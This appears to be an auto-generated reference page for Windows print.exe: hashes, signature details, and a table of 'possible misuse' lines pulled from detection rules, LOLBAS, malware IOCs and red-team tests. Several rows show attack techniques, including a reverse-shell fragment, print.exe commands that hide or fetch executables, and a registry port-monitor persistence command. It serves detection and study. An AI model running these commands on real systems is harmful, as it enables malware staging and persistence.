print.exe

  • File Path: C:\Windows\system32\print.exe
  • Description: Print Utility

Hashes

| Type | Hash |
| --- | --- |
| MD5 | 63E11431499B9603D21BA075543CD415 |
| SHA1 | 38FC357A66EF90D84FA07509DFD9071B54EB345D |
| SHA256 | 388D6761E678C66EEDA7085A05E10B13ABF88F855B753300C0F9B0D94DDB4DB0 |
| SHA384 | 48540D170C7BB0ACEA8A706705AC77492886CAA3391D09545E585ECFA3E7A0491DBDA215778C9F9C2F6FE43B6C13BE42 |
| SHA512 | 997F4CD774102FC867A7BD4C5851C13E6C160323937A31EF7678234F47EFA19E9AF492D13A37E294DF20144F8DAE6A7A7D62E0134CF0E2536FADFCCC5A4453A6 |
| SSDEEP | 192:Ks0CHkYa05foZiaDsqBNCh7MtKd+46Pv+DxlzezB/HQYjkGpnX4dhiJmVWzUW:vXbjaNNtkdU6xBezB/UQnXCVWzUW |
| IMP | D67C73847BD1DC0D9109BA544AD6C11D |
| PESHA1 | 50A77BD35AC84ECAC14CC2E25B7735F9BB89A11D |
| PE256 | 98FD7307A07AD66A5718C153284BEF7A46CED530C146EEE728D61402540AE49C |

Runtime Data

Usage (stdout):

```text
Prints a text file.

PRINT [/D:device] [[drive:][path]filename[...]]

   /D:device   Specifies a print device.
```

Loaded Modules:

| Path |
| --- |
| C:\Windows\System32\KERNEL32.DLL |
| C:\Windows\System32\KERNELBASE.dll |
| C:\Windows\SYSTEM32\ntdll.dll |
| C:\Windows\system32\print.exe |

Signature

  • Status: Signature verified.
  • Serial: 3300000266BD1580EFA75CD6D3000000000266
  • Thumbprint: A4341B9FD50FB9964283220A36A1EF6F6FAA7840
  • Issuer: CN=Microsoft Windows Production PCA 2011, O=Microsoft Corporation, L=Redmond, S=Washington, C=US
  • Subject: CN=Microsoft Windows, O=Microsoft Corporation, L=Redmond, S=Washington, C=US

File Metadata

  • Original Filename: Print.Exe.MUI
  • Product Name: Microsoft Windows Operating System
  • Company Name: Microsoft Corporation
  • File Version: 10.0.19041.1 (WinBuild.160101.0800)
  • Product Version: 10.0.19041.1
  • Language: English (United States)
  • Legal Copyright: Microsoft Corporation. All rights reserved.
  • Machine Type: 64-bit

File Scan

  • VirusTotal Detections: 0/75
  • VirusTotal Link: https://www.virustotal.com/gui/file/388d6761e678c66eeda7085a05e10b13abf88f855b753300c0f9b0d94ddb4db0/detection

Possible Misuse

The following table contains possible examples of print.exe being misused. While print.exe is not inherently malicious, its legitimate functionality can be abused for malicious purposes.

| Source | Source File | Example | License |
| --- | --- | --- | --- |
| sigma | av_printernightmare_cve_2021_34527.yml | description: Detects the suspicious file that is created from PoC code against Windows Print Spooler Remote Code Execution Vulnerability CVE-2021-34527 (PrinterNightmare), CVE-2021-1675 . | DRL 1.0 |
| sigma | lnx_shell_susp_rev_shells.yml | - ';while(cmd=c.gets);IO.popen(cmd,"r"){\|io\|c.print' | DRL 1.0 |
| sigma | zeek_dce_rpc_printnightmare_print_driver_install.yml | title: Possible PrintNightmare Print Driver Install | DRL 1.0 |
| sigma | zeek_dce_rpc_printnightmare_print_driver_install.yml | Detects the remote installation of a print driver which is possible indication of the exploitation of PrintNightmare (CVE-2021-1675). | DRL 1.0 |
| sigma | zeek_dce_rpc_printnightmare_print_driver_install.yml | The occurrence of print drivers being installed remotely via RPC functions should be rare, as print drivers are normally installed locally and or through group policy. | DRL 1.0 |
| sigma | win_exploit_cve_2021_1675_printspooler.yml | title: Possible CVE-2021-1675 Print Spooler Exploitation | DRL 1.0 |
| sigma | win_exploit_cve_2021_1675_printspooler.yml | description: Detects events of driver load errors in print service logs that could be a sign of successful exploitation attempts of print spooler vulnerability CVE-2021-1675 | DRL 1.0 |
| sigma | win_exploit_cve_2021_1675_printspooler.yml | - 'The print spooler failed to load a plug-in module' | DRL 1.0 |
| sigma | win_exploit_cve_2021_1675_printspooler_operational.yml | title: CVE-2021-1675 Print Spooler Exploitation | DRL 1.0 |
| sigma | win_exploit_cve_2021_1675_printspooler_operational.yml | description: Detects driver load events print service operational log that are a sign of successful exploitation attempts against print spooler vulnerability CVE-2021-1675 | DRL 1.0 |
| sigma | win_exploit_cve_2021_1675_printspooler_security.yml | title: CVE-2021-1675 Print Spooler Exploitation IPC Access | DRL 1.0 |
| sigma | win_exploit_cve_2021_1675_printspooler_security.yml | description: Detects remote printer driver load from Detailed File Share in Security logs that are a sign of successful exploitation attempts against print spooler vulnerability CVE-2021-1675 and CVE-2021-34527 | DRL 1.0 |
| sigma | file_event_win_cve_2021_1675_printspooler.yml | title: CVE-2021-1675 Print Spooler Exploitation Filename Pattern | DRL 1.0 |
| sigma | file_event_win_cve_2021_1675_printspooler.yml | description: Detects the default filename used in PoC code against print spooler vulnerability CVE-2021-1675 | DRL 1.0 |
| sigma | proc_creation_win_susp_print.yml | title: Abusing Print Executable | DRL 1.0 |
| sigma | proc_creation_win_susp_print.yml | description: Attackers can use print.exe for remote file copy | DRL 1.0 |
| sigma | proc_creation_win_susp_print.yml | - https://github.com/LOLBAS-Project/LOLBAS/blob/master/yml/OSBinaries/Print.yml | DRL 1.0 |
| sigma | proc_creation_win_susp_print.yml | - \print.exe | DRL 1.0 |
| sigma | proc_creation_win_susp_print.yml | - print | DRL 1.0 |
| sigma | proc_creation_win_susp_print.yml | - print.exe | DRL 1.0 |
| sigma | proc_creation_win_susp_spoolsv_child_processes.yml | description: Detects suspicious print spool service (spoolsv.exe) child processes. | DRL 1.0 |
| sigma | proc_creation_win_susp_spoolsv_child_processes.yml | - https://github.com/microsoft/Microsoft-365-Defender-Hunting-Queries/blob/master/Exploits/Print%20Spooler%20RCE/Suspicious%20Spoolsv%20Child%20Process.md | DRL 1.0 |
| sigma | registry_event_add_port_monitor.yml | TargetObject\|startswith: 'HKLM\System\CurrentControlSet\Control\Print\Monitors\' | DRL 1.0 |
| sigma | registry_event_add_port_monitor.yml | TargetObject\|contains: '\System\CurrentControlSet\Control\Print\Monitors\CutePDF Writer Monitor v4.0\Driver' | DRL 1.0 |
| sigma | registry_event_asep_reg_keys_modification.yml | - '\Print\Providers' | DRL 1.0 |
| sigma | registry_event_asep_reg_keys_modification.yml | - '\Print\Monitors' | DRL 1.0 |
| sigma | registry_event_asep_reg_keys_modification_currentcontrolset.yml | - '\Print\Providers' | DRL 1.0 |
| sigma | registry_event_asep_reg_keys_modification_currentcontrolset.yml | - '\Print\Monitors' | DRL 1.0 |
| sigma | registry_event_asep_reg_keys_modification_currentcontrolset.yml | TargetObject\|contains: '\Print\Monitors\CutePDF Writer Monitor' | DRL 1.0 |
| sigma | registry_event_mimikatz_printernightmare.yml | - '\Control\Print\Environments\Windows x64\Drivers\Version-3\QMS 810\' | DRL 1.0 |
| sigma | registry_event_mimikatz_printernightmare.yml | - '\Control\Print\Environments\Windows x64\Drivers\Version-3\mimikatz' | DRL 1.0 |
| sigma | registry_event_mimikatz_printernightmare.yml | - '\Control\Print\Environments\Windows' | DRL 1.0 |
| sigma | registry_event_mimikatz_printernightmare.yml | - '\Control\Print\Environments' | DRL 1.0 |
| sigma | registry_event_mimikatz_printernightmare.yml | - '\CurrentVersion\Print\Printers' | DRL 1.0 |
| sigma | registry_event_susp_printer_driver.yml | - '\Control\Print\Environments\Windows x64\Drivers' | DRL 1.0 |
| LOLBAS | Print.yml | Name: Print.exe | |
| LOLBAS | Print.yml | - Command: print /D:C:\ADS\File.txt:file.exe C:\ADS\File.exe | |
| LOLBAS | Print.yml | - Command: print /D:C:\ADS\CopyOfFile.exe C:\ADS\FileToCopy.exe | |
| LOLBAS | Print.yml | - Command: print /D:C:\OutFolder\outfile.exe \\WebDavServer\Folder\File.exe | |
| LOLBAS | Print.yml | - Path: C:\Windows\System32\print.exe | |
| LOLBAS | Print.yml | - Path: C:\Windows\SysWOW64\print.exe | |
| LOLBAS | Print.yml | - IOC: Print.exe retrieving files from internet | |
| LOLBAS | Print.yml | - IOC: Print.exe creating executable files on disk | |
| LOLBAS | Mshtml.yml | Description: Invoke an HTML Application via mshta.exe (Note - Pops a security warning and a print dialogue box). | |
| malware-ioc | deprimon | https://www.welivesecurity.com/2019/11/21/deprimon-default-print-monitor-malicious-downloader/[WeLiveSecurity]. | © ESET 2014-2018 |
| malware-ioc | deprimon | [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Print\Monitors\Windows Default Print Monitor] | © ESET 2014-2018 |
| malware-ioc | nouns.txt | print | © ESET 2014-2018 |
| malware-ioc | mumblehard | under the Perl interpreter. The following command ran as root will print the | © ESET 2014-2018 |
| malware-ioc | mumblehard | ps -ef \| grep -e ' httpd$' -e ' mail$' -e ' init$' \| awk '{print $2}' \| xargs -I '{}' ls -l '/proc/{}/exe' \| grep perl \| cut -d/ -f 3 | © ESET 2014-2018 |
| malware-ioc | 2020_Q4 | HKLM\SYSTEM\ControlSet001\Control\Print\Environments\Windows x64\Print Processors\BcastDVRUserService_6d67d\Driver | © ESET 2014-2018 |
| malware-ioc | 2020_Q4 | HKLM\SYSTEM\ControlSet001\Control\Print\Environments\Windows x64\Print Processors\BcastDVRUserService_3c628o\Driver | © ESET 2014-2018 |
| malware-ioc | 2020_Q4 | HKLM\SOFTWARE\Microsoft\Print\Components\Spooler-PPC\{94E5H6D48A-P895-85E1-54DD-080636B11A03} | © ESET 2014-2018 |
| malware-ioc | 2020_Q4 | HKLM\SOFTWARE\Microsoft\Print\Components\Spooler-PPC\{38C8D238Q-923C-D782-9B8J-829263CD85C9} | © ESET 2014-2018 |
| malware-ioc | vf_ioc_linux_rakos.py | print("Suspected PID: {0:8s} {1:<16}:{2:>5} {3:<16}:{4:>5} {5:<15s} {6:>17s}/{7:<5d}\n".format(proto, saddr, sport, daddr, dport, state, task.comm, task.pid)) | © ESET 2014-2018 |
| malware-ioc | windigo_signatures.pl | print "mod_str_ : "; | © ESET 2014-2018 |
| malware-ioc | windigo_signatures.pl | print "$f : crypted, skip\n"; | © ESET 2014-2018 |
| malware-ioc | windigo_signatures.pl | print $fc. "\n"; | © ESET 2014-2018 |
| malware-ioc | windigo_signatures.pl | print "mod_ssh: \n"; | © ESET 2014-2018 |
| malware-ioc | windigo_signatures.pl | print | © ESET 2014-2018 |
| malware-ioc | windigo_signatures.pl | print "mod_sshd1: '$sd[1]':'$sd[2]'\n"; | © ESET 2014-2018 |
| malware-ioc | windigo_signatures.pl | print "mod_sshc1: '$sc[1]':'$sc[2]'\n"; | © ESET 2014-2018 |
| malware-ioc | windigo_signatures.pl | print "mod_sshd1a: file:'$sd[4]'; hash:'$sd[15]'; cvs:'$sd[1]'\n"; | © ESET 2014-2018 |
| malware-ioc | windigo_signatures.pl | print "mod_sshd2: '$sd[1]':'$sd[2]':'$sd[3]'\n"; | © ESET 2014-2018 |
| malware-ioc | windigo_signatures.pl | print "mod_sshc4: '$sc[1]':'$sc[0]'\n" if @sc and f $sc[1]; | © ESET 2014-2018 |
| malware-ioc | windigo_signatures.pl | print "mod_sshd4: '$sd[0]':'$sd[1]':'$sd[2]'\n"; | © ESET 2014-2018 |
| malware-ioc | windigo_signatures.pl | print "mod_sshd5: " . join( '\|', @sd ) . "\n"; | © ESET 2014-2018 |
| malware-ioc | windigo_signatures.pl | print "mod_sshd6: '$sd[2]':'$sd[0]'\nmod_sshc6: '$sc[0]'\n"; | © ESET 2014-2018 |
| malware-ioc | windigo_signatures.pl | print "mod_sshd7: '$sd[0]':'$sd[4]'\nmod_sshc7: '$sc[0]'\n"; | © ESET 2014-2018 |
| malware-ioc | windigo_signatures.pl | print "mod_sshd8: '$sd[1]':'$sd[2]'\nmod_sshc8: '$sc[1]'\n"; | © ESET 2014-2018 |
| malware-ioc | windigo_signatures.pl | print | © ESET 2014-2018 |
| malware-ioc | windigo_signatures.pl | if (@sd) { print "mod_sshd12: GET, no params"; ssh_ls() } | © ESET 2014-2018 |
| malware-ioc | windigo_signatures.pl | print "mod_sshd14: hash:'$sd[3]':'$sd[4]':'$sd[2]'\n"; | © ESET 2014-2018 |
| malware-ioc | windigo_signatures.pl | print "mod_sshc14: hash:'$sd[3]':'$sd[4]':'$sd[2]'\n"; | © ESET 2014-2018 |
| malware-ioc | windigo_signatures.pl | else { print "mod_sshd14: unknown hash; fpass:'$sd[1]';'$sd[3]'\n" } | © ESET 2014-2018 |
| malware-ioc | windigo_signatures.pl | print "mod14p: $d\n"; | © ESET 2014-2018 |
| malware-ioc | windigo_signatures.pl | print "mod_sshd15: '$sd[0]':'$sd[2]'\n"; | © ESET 2014-2018 |
| malware-ioc | windigo_signatures.pl | print "mod_sshc15: '$sc[38]':'$sc[0]'\n"; | © ESET 2014-2018 |
| malware-ioc | windigo_signatures.pl | print "mod_sshd16: '$sd[0]':'$sd[1]'\n"; | © ESET 2014-2018 |
| malware-ioc | windigo_signatures.pl | print "mod_sshc16: '$sc[1]':'$sc[0]'\n"; | © ESET 2014-2018 |
| malware-ioc | windigo_signatures.pl | print "mod_sshd17: crypt:'$sd[2]':'$sd[0]'\n"; | © ESET 2014-2018 |
| malware-ioc | windigo_signatures.pl | print "mod_sshc17: '$sc[0]':'$sc[1]'\n"; | © ESET 2014-2018 |
| malware-ioc | windigo_signatures.pl | print "mod_sshd17: client_string:'$q[1]'\n"; | © ESET 2014-2018 |
| malware-ioc | windigo_signatures.pl | print "mod_sshd18: md5:'$sd[3]':'$sd[0]'\n"; | © ESET 2014-2018 |
| malware-ioc | windigo_signatures.pl | print "mod_sshc18: md5:'$sc[3]':'$sc[0]'\n"; | © ESET 2014-2018 |
| malware-ioc | windigo_signatures.pl | print "mod_sshd19: '$sd[0]':'$sd[1]' url:'$sd[5] '$sd[4]'\n"; | © ESET 2014-2018 |
| malware-ioc | windigo_signatures.pl | print "mod_sshd20: '$sd[0]':'$sd[1]'\n"; | © ESET 2014-2018 |
| malware-ioc | windigo_signatures.pl | print "mod_sshc20: '$sc[0]':'$sc[1]'\n"; | © ESET 2014-2018 |
| malware-ioc | windigo_signatures.pl | print "mod_sshd21: '$sd[0]' mod_sshc21: '$sc[0]':'$sc[1]'\n"; | © ESET 2014-2018 |
| malware-ioc | windigo_signatures.pl | print "mod_sshc22: '$sd[0]':'$sd[1]':'$sd[2]'\n"; | © ESET 2014-2018 |
| malware-ioc | windigo_signatures.pl | print "mod_sshd23: '$sd[2]':'$sd[0]'\n"; | © ESET 2014-2018 |
| malware-ioc | windigo_signatures.pl | print "mod_sshc23: '$sc[0]':'$sc[1]'\n"; | © ESET 2014-2018 |
| malware-ioc | windigo_signatures.pl | print "mod_sshd24: '$sd[0]':'$sd[17]':'$sd[18]:$sd[20]'\n"; | © ESET 2014-2018 |
| malware-ioc | windigo_signatures.pl | print "mod_sshc24: '$sc[1]':'$sc[0]'\n"; | © ESET 2014-2018 |
| malware-ioc | windigo_signatures.pl | print "mod_sshd25: '$sd[2]':'$sd[0]' mod_sshc25: '$sc[0]'\n"; | © ESET 2014-2018 |
| malware-ioc | windigo_signatures.pl | print "mod_sshd27: '$sd[0]':'$sd[2]':'$sd[1]'\nmod_sshc27: '$sc[0]'\n"; | © ESET 2014-2018 |
| malware-ioc | windigo_signatures.pl | print "mod_sshd31: hash:'$sd[2]':'$sd[1]':'$sd[0]'\n"; | © ESET 2014-2018 |
| malware-ioc | windigo_signatures.pl | print "mod_sshd32: md5:'$sd1[0]:'$sd[0]':'$sc[0]'\n"; | © ESET 2014-2018 |
| malware-ioc | windigo_signatures.pl | print "mod_sshd33: '$sd[0]':'$sd[1]':'$sc[0]'\n"; | © ESET 2014-2018 |
| malware-ioc | windigo_signatures.pl | print $q. "\n"; | © ESET 2014-2018 |
| malware-ioc | windigo_signatures.pl | print "mod_sshd36: md5:'$sd[0]':'$sc[0]'; '$sd[1]':'$sc[1]'\n"; | © ESET 2014-2018 |
| malware-ioc | windigo_signatures.pl | print "mod_sshd37: md5:'$sd[0]'; '$sd[1]':'$sd[3]'\n"; | © ESET 2014-2018 |
| malware-ioc | windigo_signatures.pl | while (<$fn>) { chomp; print $_ ^ "\x14" x length $_ } | © ESET 2014-2018 |
| malware-ioc | windigo_signatures.pl | print "mod_ssh41_cstr: " . join( '\|', sort keys %ostr ) . "\n"; | © ESET 2014-2018 |
| malware-ioc | windigo_signatures.pl | print "mod_sshd41: '$sd[1]' '$sd[0]', crypted\n"; | © ESET 2014-2018 |
| malware-ioc | windigo_signatures.pl | print "mod_sshc41: '$sc[1]' '$sc[0]', crypted\n"; | © ESET 2014-2018 |
| malware-ioc | windigo_signatures.pl | print "mod_sshd42: detected; log_useragent:passwd_file:passwd\n" if @sd; | © ESET 2014-2018 |
| malware-ioc | windigo_signatures.pl | print "mod_sshc42: detected\n" if @sc; | © ESET 2014-2018 |
| malware-ioc | windigo_signatures.pl | print "mod_sshd44: pass:'$sd[1]' '$sd[0]', '$sd[2]'\n"; | © ESET 2014-2018 |
| malware-ioc | windigo_signatures.pl | if ( $sc[0] ) { print "mod_sshc44: '$sc[0]' '$sc[13]'\n"; ssh_ls( $sd[0] ) } | © ESET 2014-2018 |
| malware-ioc | windigo_signatures.pl | print "mod_sshd45: pass:'$sd[1]' host:'$sd[0]', '$sd[2]'\n"; | © ESET 2014-2018 |
| malware-ioc | windigo_signatures.pl | if ( $sc[0] ) { print "mod_sshc45: host:'$sc[0]' '$sc[1]'\n"; ssh_ls() } | © ESET 2014-2018 |
| malware-ioc | windigo_signatures.pl | print "mod_sshd46: crypt:'$sc[1]' v1:'$sd[1]' v2:'$sd[2]'\n"; | © ESET 2014-2018 |
| malware-ioc | windigo_signatures.pl | print "mod_sshd47: pass:'$sd[0]' '$sd[1]', '$sd[2]'\n"; | © ESET 2014-2018 |
| malware-ioc | windigo_signatures.pl | if (@sc) { print "mod_sshc47: host:'$sc[0]' '$sc[-1]'\n"; ssh_ls( $sc[0] ) } | © ESET 2014-2018 |
| malware-ioc | windigo_signatures.pl | for (@sd) { print "mod_md5_sshd: '$_'\n" } | © ESET 2014-2018 |
| malware-ioc | windigo_signatures.pl | for (@sc) { print "mod_md5_ssh: '$_'\n" } | © ESET 2014-2018 |
| malware-ioc | windigo_signatures.pl | print "mod_md5_static_ssl: $static_ssl\n" if $static_ssl; | © ESET 2014-2018 |
| malware-ioc | windigo_signatures.pl | print "mod_hack_strd: possible hacked, " . join( "\|", @sd ) . "\n"; | © ESET 2014-2018 |
| malware-ioc | windigo_signatures.pl | print "mod_hack_strc: possible hacked, " . join( "\|", @sc ) . "\n"; | © ESET 2014-2018 |
| malware-ioc | windigo_signatures.pl | for (@sd) { print "mod_md5_sshd1: '$_'\n" } | © ESET 2014-2018 |
| malware-ioc | windigo_signatures.pl | print "mod_str_sshd_str: '" . join( "':'", keys %ostr ) . "'\n"; | © ESET 2014-2018 |
| malware-ioc | windigo_signatures.pl | print "mod_str_sshd_str1: '" . join( "':'", keys %ostr ) . "'\n"; | © ESET 2014-2018 |
| malware-ioc | windigo_signatures.pl | if (@sd) { print "sshd_str: " . join( '\|', @sd ) . "\n" } | © ESET 2014-2018 |
| malware-ioc | windigo_signatures.pl | if (@sc) { print "sshc_str: " . join( '\|', @sc ) . "\n" } | © ESET 2014-2018 |
| malware-ioc | turla | ** ResultQueue::print``{:.highlight .language-cmhg} | © ESET 2014-2018 |
| malware-ioc | turla | ** TaskQueue::print``{:.highlight .language-cmhg} | © ESET 2014-2018 |
| malware-ioc | windigo | print the dynamic section of the ELF header. Anything NEEDED (type 1) other | © ESET 2014-2018 |
| malware-ioc | windigo | OpenSSH version 6.7 or earlier. A clean server will print | © ESET 2014-2018 |
| malware-ioc | windigo | to stderr but an infected server will only print the usage (note the missing | © ESET 2014-2018 |
| malware-ioc | windigo | yields no output if one is not infected and would print a filename if one is. | © ESET 2014-2018 |
| malware-ioc | windigo | ps -ef \| grep crond \| grep -v grep \| awk '{print $2}' | © ESET 2014-2018 |
| malware-ioc | winnti_group | HKLM\SYSTEM\ControlSet001\Control\Print\Environments\Windows x64\Print Processors\PrintFiiterPipelineSvc\Driver = DEment.dll | © ESET 2014-2018 |
| malware-ioc | winnti_group | HKLM\SYSTEM\CurrentControlSet\Control\Print\Environments\Windows x64\Print Processors\lltdsvc1\Driver = EntAppsvc.dll | © ESET 2014-2018 |
| malware-ioc | winnti_group | HKLM\SOFTWARE\Microsoft\Print\Components\DC20FD7E-4B1B-4B88-8172-61F0BED7D9E8 | © ESET 2014-2018 |
| malware-ioc | winnti_group | HKLM\SOFTWARE\Microsoft\Print\Components\A66F35-4164-45FF-9CB4-69ACAA10E52D | © ESET 2014-2018 |
| atomic-red-team | index.md | - T1547.012 Print Processors CONTRIBUTE A TEST | MIT License. © 2018 Red Canary |
| atomic-red-team | index.md | - Atomic Test #4: Simulate BlackByte Ransomware Print Bombing [windows] | MIT License. © 2018 Red Canary |
| atomic-red-team | windows-index.md | - T1547.012 Print Processors CONTRIBUTE A TEST | MIT License. © 2018 Red Canary |
| atomic-red-team | windows-index.md | - Atomic Test #4: Simulate BlackByte Ransomware Print Bombing [windows] | MIT License. © 2018 Red Canary |
| atomic-red-team | matrix.md | \| \| \| Outlook Forms CONTRIBUTE A TEST \| Print Processors CONTRIBUTE A TEST \| Impair Defenses CONTRIBUTE A TEST \| \| \| \| \| \| \| \| | MIT License. © 2018 Red Canary |
| atomic-red-team | matrix.md | \| \| \| Print Processors CONTRIBUTE A TEST \| Services File Permissions Weakness CONTRIBUTE A TEST \| Masquerade Task or Service \| \| \| \| \| \| \| \| | MIT License. © 2018 Red Canary |
| atomic-red-team | windows-matrix.md | \| \| \| Password Filter DLL \| Print Processors CONTRIBUTE A TEST \| Indicator Removal from Tools CONTRIBUTE A TEST \| \| \| \| \| \| \| \| | MIT License. © 2018 Red Canary |
| atomic-red-team | windows-matrix.md | \| \| \| Print Processors CONTRIBUTE A TEST \| Security Support Provider \| Mark-of-the-Web Bypass \| \| \| \| \| \| \| \| | MIT License. © 2018 Red Canary |
| atomic-red-team | T1016.md | if [ -x "$(command -v netstat)" ]; then netstat -ant \| awk '{print $NF}' \| grep -v '[a-z]' \| sort \| uniq -c; else echo "netstat is missing from the machine. skipping..."; fi; | MIT License. © 2018 Red Canary |
| atomic-red-team | T1018.md | Upon successful execution, cmd.exe will execute net.exe view and display results of local systems on the network that have file and print sharing enabled. | MIT License. © 2018 Red Canary |
| atomic-red-team | T1018.md | adidnsdump -u #{user_name} -p #{acct_pass} --print-zones #{host_name} | MIT License. © 2018 Red Canary |
| atomic-red-team | T1027.004.md | Upon execution, the exe will print 'T1027.004 Dynamic Compile'. | MIT License. © 2018 Red Canary |
| atomic-red-team | T1036.006.md | 1. echo '#!/bin/bash\necho "print "hello, world!"" \| /usr/bin/python\nexit' > execute.txt && chmod +x execute.txt | MIT License. © 2018 Red Canary |
| atomic-red-team | T1059.003.md | - Atomic Test #4 - Simulate BlackByte Ransomware Print Bombing | MIT License. © 2018 Red Canary |
| atomic-red-team | T1059.003.md | ## Atomic Test #4 - Simulate BlackByte Ransomware Print Bombing | MIT License. © 2018 Red Canary |
| atomic-red-team | T1059.003.md | It is designed to mimic BlackByte ransomware's print bombing technique, where tree.dll, which contains the ransom note, is opened in Wordpad 75 times and then printed. | MIT License. © 2018 Red Canary |
| atomic-red-team | T1059.003.md | \| max_to_print \| The maximum number of Wordpad windows the test will open/print. \| String \| 75\| | MIT License. © 2018 Red Canary |
| atomic-red-team | T1059.003.md | ##### Description: File to print must exist on disk at specified location (#{file_to_print}) | MIT License. © 2018 Red Canary |
| atomic-red-team | T1082.md | in order simply print the recon results to the screen as opposed to exfiltrating them. Script. | MIT License. © 2018 Red Canary |
| atomic-red-team | T1083.md | cd $HOME && find . -print \| sed -e 's;[^/]*/;\|;g;s;\|; \|;g' > #{output_file} | MIT License. © 2018 Red Canary |
| atomic-red-team | T1110.003.md | This atomic attempts to map the IPC$ share on one of the Domain Controllers using a password of Spring2020 for each user in the %temp%\users.txt list. Any successful authentications will be printed to the screen with a message like "[*] username:password", whereas a failed auth will simply print a period. Use the input arguments to specify your own password to use for the password spray. | MIT License. © 2018 Red Canary |
| atomic-red-team | T1127.001.md | Executes the code in a project file using msbuild.exe. The default C# project example file (T1127.001.csproj) will simply print "Hello From a Code Fragment" and "Hello From a Class." to the screen. | MIT License. © 2018 Red Canary |
| atomic-red-team | T1127.001.md | Executes the code in a project file using msbuild.exe. The default Visual Basic example file (vb.xml) will simply print "Hello from a Visual Basic inline task!" to the screen. | MIT License. © 2018 Red Canary |
| atomic-red-team | T1140.md | \| message \| Message to print to the screen \| String \| Hello from Atomic Red Team test T1140!\| | MIT License. © 2018 Red Canary |
| atomic-red-team | T1140.md | ENCODED=$(python3 -c 'import base64;enc=base64.b64encode("#{message}".encode());print(enc.decode())') | MIT License. © 2018 Red Canary |
| atomic-red-team | T1140.md | python3 -c "import base64;dec=base64.b64decode("$ENCODED");print(dec.decode())" | MIT License. © 2018 Red Canary |
| atomic-red-team | T1140.md | python3 -c "import base64 as d;dec=d.b64decode("$ENCODED");print(dec.decode())" | MIT License. © 2018 Red Canary |
| atomic-red-team | T1140.md | python3 -c "from base64 import b64decode;dec=b64decode("$ENCODED");print(dec.decode())" | MIT License. © 2018 Red Canary |
| atomic-red-team | T1140.md | python3 -c "from base64 import b64decode as d;dec=d("$ENCODED");print(dec.decode())" | MIT License. © 2018 Red Canary |
| atomic-red-team | T1140.md | echo $ENCODED \| python3 -c "import base64,sys;dec=base64.b64decode(sys.stdin.read());print(dec.decode())" | MIT License. © 2018 Red Canary |
| atomic-red-team | T1140.md | echo $ENCODED > #{encoded_file} && python3 -c "import base64;dec=base64.b64decode(open('#{encoded_file}').read());print(dec.decode())" | MIT License. © 2018 Red Canary |
| atomic-red-team | T1140.md | ENCODED=$(perl -e "use MIME::Base64;print(encode_base64('#{message}'));") | MIT License. © 2018 Red Canary |
| atomic-red-team | T1140.md | perl -le "use MIME::Base64;print(decode_base64('$ENCODED'));" | MIT License. © 2018 Red Canary |
| atomic-red-team | T1140.md | echo $ENCODED \| perl -le 'use MIME::Base64;print(decode_base64());' | MIT License. © 2018 Red Canary |
| atomic-red-team | T1140.md | echo $ENCODED > #{encoded_file} && perl -le 'use MIME::Base64;open($f,"<","#{encoded_file}");print(decode_base64(<$f>));' | MIT License. © 2018 Red Canary |
| atomic-red-team | T1485.md | dd of=#{file_to_overwrite} if=#{overwrite_source} count=$(ls -l #{file_to_overwrite} \| awk '{print $5}') iflag=count_bytes | MIT License. © 2018 Red Canary |
| atomic-red-team | T1489.md | Stops a specified service using the net.exe command. Upon execution, if the service was running "The Print Spooler service was stopped successfully." | MIT License. © 2018 Red Canary |
| atomic-red-team | T1489.md | will be displayed. If the service was not running, "The Print Spooler service is not started." will be displayed and it can be | MIT License. © 2018 Red Canary |
| atomic-red-team | T1518.md | /usr/libexec/PlistBuddy -c "print :CFBundleShortVersionString" /Applications/Safari.app/Contents/Info.plist | MIT License. © 2018 Red Canary |
| atomic-red-team | T1518.md | /usr/libexec/PlistBuddy -c "print :CFBundleVersion" /Applications/Safari.app/Contents/Info.plist | MIT License. © 2018 Red Canary |
| atomic-red-team | T1546.001.md | * HKEY_CLASSES_ROOT\txtfile\shell\print\command | MIT License. © 2018 Red Canary |
| atomic-red-team | T1547.010.md | <blockquote>Adversaries may use port monitors to run an attacker supplied DLL during system boot for persistence or privilege escalation. A port monitor can be set through the AddMonitor API call to set a DLL to be loaded at startup. (Citation: AddMonitor) This DLL can be located in C:\Windows\System32 and will be loaded by the print spooler service, spoolsv.exe, on boot. The spoolsv.exe process also runs under SYSTEM level permissions. (Citation: Bloxham) Alternatively, an arbitrary DLL can be loaded if permissions allow writing a fully-qualified pathname for that DLL to HKLM\SYSTEM\CurrentControlSet\Control\Print\Monitors. | MIT License. © 2018 Red Canary |
| atomic-red-team | T1547.010.md | reg add "hklm\system\currentcontrolset\control\print\monitors\ART" /v "Atomic Red Team" /d "#{monitor_dll}" /t REG_SZ | MIT License. © 2018 Red Canary |
| atomic-red-team | T1547.010.md | reg delete "hklm\system\currentcontrolset\control\print\monitors\ART" /f >nul 2>&1 | MIT License. © 2018 Red Canary |
| atomic-red-team | T1562.004.md | Print the last 10 lines of the Uncomplicated Firewall (UFW) log file | MIT License. © 2018 Red Canary |
| atomic-red-team | T1564.004.md | print /D:#{path}\file.txt:autoruns.exe #{path}\Autoruns.exe | MIT License. © 2018 Red Canary |
| signature-base | apt_backdoor_ssh_python.yar | $s1 = "print '[-] (Failed to load moduli -- gex will be unsupported.)'" fullword ascii | CC BY-NC 4.0 |
| signature-base | apt_backdoor_ssh_python.yar | $s2 = "print '[-] Listen/bind/accept failed: ' + str(e)" fullword ascii | CC BY-NC 4.0 |
| signature-base | apt_backdoor_ssh_python.yar | $s4 = "print '[-] SSH negotiation failed.'" fullword ascii | CC BY-NC 4.0 |
| signature-base | apt_eqgrp.yar | $x2 = "print "Gimme hex: ";" fullword ascii | CC BY-NC 4.0 |
| signature-base | apt_eqgrp.yar | $s3 = "print "$hex in decimal=$dec\n\n";" fullword ascii | CC BY-NC 4.0 |
| signature-base | apt_eqgrp.yar | $s2 = "print "ERROR: the filename or hex representation needs to be one argument try using \"'s\n";" fullword ascii | CC BY-NC 4.0 |
| signature-base | apt_eqgrp.yar | $s5 = "print hextoIP($ARGV[0]);" fullword ascii | CC BY-NC 4.0 |
| signature-base | apt_eqgrp.yar | $s2 = "print >>out, "%s%04x " % (lead,i)," fullword ascii | CC BY-NC 4.0 |
| signature-base | apt_eqgrp.yar | $s3 = "print >>out, "%02X" % ord(x[i+j])," fullword ascii | CC BY-NC 4.0 |
| signature-base | apt_eqgrp.yar | $s4 = "print >>out, sane(x[i:i+16])" fullword ascii | CC BY-NC 4.0 |
